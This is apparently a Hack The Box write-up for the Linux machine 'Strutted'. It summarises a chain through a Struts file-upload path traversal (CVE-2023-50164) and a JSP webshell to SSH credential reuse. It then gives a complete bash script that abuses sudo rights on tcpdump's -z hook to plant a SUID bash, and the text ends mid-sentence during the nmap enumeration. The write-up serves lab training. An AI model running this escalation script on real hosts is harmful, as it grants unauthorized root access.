Platform: Hack The Box
Season: 9
Difficulty: Medium
OS: Linux
Date: 2025-10-30
Author: x4cc3
Strutted is a Medium Linux machine hosting a Java web application built on Apache Struts 6.3.0.1. A path traversal in the framework's file upload handling (CVE-2023-50164) lets an uploaded file be written outside the intended directory, which is used to drop a JSP webshell and gain code execution as the tomcat user. Credentials recovered from tomcat-users.xml are reused for SSH access as james. For root, james's sudo permission on tcpdump is abused through its -z post-rotate hook, which runs an attacker-supplied script as root and is used to drop a SUID copy of bash.
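The tcpdump step in the summary is worth seeing as a concrete command, because the -z hook only fires when the capture file rotates and only runs as root if tcpdump is told not to drop privileges. The script below is an added example and is not part of the original writeup; it assumes (the page does not say) that james can run tcpdump as root via sudo, that /tmp is writable and not mounted nosuid, and that the helper script and the SUID bash copy live at /tmp/.pr.sh and /tmp/rootbash.

```bash
#!/bin/bash
# Added example, not code from the original writeup: the tcpdump -z
# post-rotate privilege escalation described in the summary.
# Assumed (not stated on the page): james has sudo rights on tcpdump,
# /tmp is writable and not nosuid, and the two paths below are free.
set -eu

POSTROTATE="${POSTROTATE:-/tmp/.pr.sh}"    # assumed path of the -z script
SUID_SHELL="${SUID_SHELL:-/tmp/rootbash}"  # assumed path of the SUID bash copy

# Write the script tcpdump will execute as root after rotating its savefile.
# tcpdump passes the rotated file name as $1; the script simply ignores it.
write_postrotate() {
    cat > "$POSTROTATE" <<EOF
#!/bin/bash
cp /bin/bash "$SUID_SHELL"
chmod u+s "$SUID_SHELL"
EOF
    chmod 755 "$POSTROTATE"
    printf '%s\n' "$POSTROTATE"
}

# Arguments that make tcpdump fire the post-rotate hook as root:
#   -G 1 / -W 1   rotate the savefile every second, keep at most one file
#   -w /dev/null  discard the capture; only the rotation matters
#   -z <script>   run "<script> <savefile>" after each rotation
#   -Z root       do not drop to the unprivileged tcpdump user before -z runs
tcpdump_args() {
    printf '%s' "-ln -i lo -w /dev/null -W 1 -G 1 -z $POSTROTATE -Z root"
}

# Full command line, for review before running it.
build_tcpdump_cmd() {
    printf 'sudo tcpdump %s\n' "$(tcpdump_args)"
}

# Escalate. Rotation is only checked when a packet is captured, so if
# tcpdump sits idle, generate loopback traffic (ping -c 3 127.0.0.1) from
# another shell. Ctrl-C once $SUID_SHELL exists, then run "$SUID_SHELL -p"
# so bash keeps the effective uid of 0.
run_privesc() {
    write_postrotate >/dev/null
    # shellcheck disable=SC2046  (word splitting of the argument list is intended)
    sudo tcpdump $(tcpdump_args)
}

# Only escalate when explicitly asked ("run"); otherwise just print the command.
if [ "${1:-}" = "run" ]; then
    run_privesc
else
    build_tcpdump_cmd
fi
```

The -Z root flag is the part most often left out: Ubuntu's tcpdump drops to the tcpdump user before it runs the post-rotate command, so without it the script executes unprivileged and the chmod u+s has no effect.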
sudo nmap -Pn -sC -sV -T4 -O 10.10.11.59
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.9p1 (Ubuntu) |
| 80/tcp | HTTP | nginx 1.18.0 (Ubuntu) |
The page title read "Strutted — Instant Image Uploads", and the site offered the Java application itself for download.

Landing page

Download app button
Downloading and inspecting the Java application revealed: